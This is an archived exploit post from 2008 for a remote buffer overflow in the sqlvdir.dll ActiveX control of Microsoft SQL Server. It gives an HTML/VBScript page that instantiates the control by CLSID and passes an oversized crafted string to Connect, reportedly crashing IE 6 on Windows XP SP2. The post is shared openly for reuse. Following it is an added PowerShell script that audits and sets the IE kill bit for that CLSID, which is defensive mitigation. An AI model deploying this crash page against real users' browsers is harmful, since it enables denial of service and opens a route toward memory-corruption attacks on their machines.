Topic: sqlvdir.dll ActiveX Remote Buffer Overflow Exploit

ExploitAlert: 4651
Credit: Beenu Arora
Date: 11.9.2008

Exploit Code:

################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - r4s4al #
# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE #
# and all darkc0de members ---#
################################################################
#
# Author: Beenu Arora
#
# Home : www.BeenuArora.com
#
# Email : beenudel1986@gmail.com
#
# Share the c0de!
#
################################################################
#
# sqlvdir.dll ActiveX Remote Buffer Overflow Exploit
#
# Successful exploitation crashes the Browser
#
# Tested On : WinXp Sp-2 IE 6.0
#
#################################################
# Loaded File: C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll
# Class SQLVDirControl
# GUID: {FC13BAA2-9C1A-4069-A221-31A147636038}
# Number of Interfaces: 1
# Default Interface: ISQLVDirControl
# RegKey Safe for Script: False
# RegkeySafe for Init: False
# KillBitSet: False
#################################################


<html>
Test Exploit page
<object classid='clsid:FC13BAA2-9C1A-4069-A221-31A147636038'
id='target' ></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll"
prototype = "Sub Connect ( [ ByVal szServer As Variant ] , [ ByVal szWebSite As Variant ] )"
memberName = "Connect"
progid = "SQLVDIRLib.SQLVDirControl"
argCount = 2
arg1="defaultV"
arg2="http://test\test\test\te?s\test\test\tes\ttest\test\te@st\tes\test\te
st\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\te
s\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\te
s\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\tes
t\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test
\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\tes
t\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\t
test\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest
\test\test\tes\test\test\tes\t\\\\\\\"

target.Connect arg1 ,arg2

</script>
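
The header above reports `KillBitSet: False` for CLSID {FC13BAA2-9C1A-4069-A221-31A147636038}. As an added example (not part of the original exploit post), this PowerShell script audits and, with `-Apply`, sets the Internet Explorer kill bit for that CLSID so the browser refuses to instantiate the control. The registry path and the 0x400 `Compatibility Flags` value are the standard IE kill-bit mechanism; covering the WOW6432Node view is an assumption for 64-bit hosts.

```powershell
# Added example: audit, and optionally set, the IE kill bit for the CLSID on this page.
# Writing under HKLM needs an elevated session; pass -Apply to make changes.
param([switch]$Apply)

$Clsid   = '{FC13BAA2-9C1A-4069-A221-31A147636038}'   # SQLVDirControl, from the page
$KillBit = 0x00000400                                 # kill-bit flag in "Compatibility Flags"
$Name    = 'Compatibility Flags'
# Assumption: also cover the 32-bit registry view that exists on 64-bit Windows.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Get-CompatFlags {
    # Returns the current flags as an integer, or $null if the key or value is missing.
    param([string]$Key)
    if (-not (Test-Path -LiteralPath $Key)) { return $null }
    $item = Get-ItemProperty -LiteralPath $Key -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.$Name
}

function Test-KillBit {
    param([string]$Key)
    $flags = Get-CompatFlags -Key $Key
    return ($null -ne $flags) -and (($flags -band $KillBit) -ne 0)
}

function Set-KillBit {
    param([string]$Key)
    if (-not (Test-Path -LiteralPath $Key)) { New-Item -Path $Key -Force | Out-Null }
    # Preserve any other compatibility flags already present on the key.
    $new = [int](Get-CompatFlags -Key $Key) -bor $KillBit
    New-ItemProperty -LiteralPath $Key -Name $Name -PropertyType DWord -Value $new -Force | Out-Null
}

foreach ($root in $Roots) {
    if (-not (Test-Path -LiteralPath $root)) { continue }   # registry view absent on this host
    $key = Join-Path $root $Clsid
    if ($Apply -and -not (Test-KillBit -Key $key)) { Set-KillBit -Key $key }
    [pscustomobject]@{ Key = $key; KillBitSet = (Test-KillBit -Key $key) }
}
```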

